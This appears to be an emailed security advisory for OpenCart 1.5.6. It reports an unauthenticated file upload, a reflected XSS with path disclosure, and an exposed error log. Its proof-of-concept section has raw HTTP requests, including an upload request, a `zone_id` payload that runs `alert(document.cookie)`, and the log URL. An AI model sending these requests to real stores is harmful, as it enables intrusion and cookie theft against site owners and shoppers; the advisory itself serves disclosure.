--479758653-844428858-1386184016=:70324 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable ###########################################################################= =0A# Title: Opencart Multiple Vulnerabilities=0A# Vendor: http://www.openca= rt.com=0A# Vulnerabilities: Arbitrary File Upload, XSS, Path Disclosure=0A#= Vulnerable Version: opencart 1.5.6 (prior versions also may be affected)= =0A# Exploitation: Remote with browser=0A# Impact: High=0A# Vendor Supplied= Patch: N/A=0A# Original Advisory with Workaround: =0A# http://www.garda.ir= /Opencart_Multiple_Vulnerabilities.html=0A#################################= ##########################################=0A=0A####################=0A- De= scription:=0A####################=0A=0AQuote from vendor: OpenCart is a tur= n-key ready "out of the box" shopping cart solution.=0AYou simply install, = select your template, add products and you're ready to start accepting orde= rs.=0A=0A=0A####################=0A- Vulnerability:=0A####################= =0AIn the process of optimizing our crawler engine by garda.ir (garda.ir is= a Persian online shopping price comparison service which uses new search e= ngine technologies to grab prices) we found file upload vulnerability in op= encart application, further investigation lead us to discover other vulnera= bilities such as path disclosure and xss.=0A=C2=A0=0A=0A=0A################= ####=0A- POC:=0A####################=0A=0A# 1=0A# File Upload=0A# Insuffici= ent Authorization in /catalog/controller/product/product.php =0A# Result: t= estupload.txt.somehash is created in /download folder=0A=0A=0APOST /opencar= t-1.5.6/index.php?route=3Dproduct/product/upload HTTP/1.1=0AHost: example.c= om=0AContent-Type: multipart/form-data; boundary=3D------------------------= ---4827543632391=0AContent-Length: 206=0AConnection: Keep-Alive=0A=0A=0A---= --------------------------4827543632391=0AContent-Disposition: form-data; n= ame=3D"file"; filename=3D"testupload.txt"=0AContent-Type: text/plain=0A=0At= esttesttest=0A-----------------------------4827543632391--=0A=0A=0A# 2=0A# = Reflected XSS and Path Disclosure=0A# Input Validation Error in /catalog/co= ntroller/account/register.php=0A# Result: this will cause arbitrary scripti= ng code to be executed by the=C2=A0=C2=A0=C2=A0=C2=A0=C2=A0=C2=A0 # target = user's browser.=0A=0APOST /opencart-1.5.6/index.php?route=3Daccount/registe= r HTTP/1.1=0AContent-Type: multipart/form-data; boundary=3D----------------= -----------1e7a98bc645efbe7=0AContent-Length: 181=0AHost: example.com=0ACon= nection: Keep-Alive=0A=0A=0A-----------------------------1e7a98bc645efbe7= =0AContent-Disposition: form-data; name=3D"zone_id"=0A=0A12345'+alert(docum= ent.cookie)+'=0A-----------------------------1e7a98bc645efbe7--=0A=0A=0A# 3= =0A# Information Leakage =E2=80=93 Path Disclosure=0A# Insufficient Authori= zation in /system/logs/error.txt =0A# Result: Information Disclosure=0A=0Ah= ttp://www.example.com/opencart-1.5.6/system/logs/error.txt=0A=0A=0A########= ############=0A- Solution:=0A####################=0AThere is no Vendor Supp= lied Patch at the time of this entry.=0AFor workaround check the Original A= dvisory.=0A=0A=0A####################=0A- Credit:=0A####################=0A= Discovered by: trueend5 (trueend5 [at] yahoo com)=0A=0AThis advisory is spo= nsored by garda.ir=0Ahttp://www.garda.ir=0AA Persian online shopping price = comparison service=0A --479758653-844428858-1386184016=:70324 Content-Type: text/html; charset=utf-8 Content-Transfer-Encoding: quoted-printable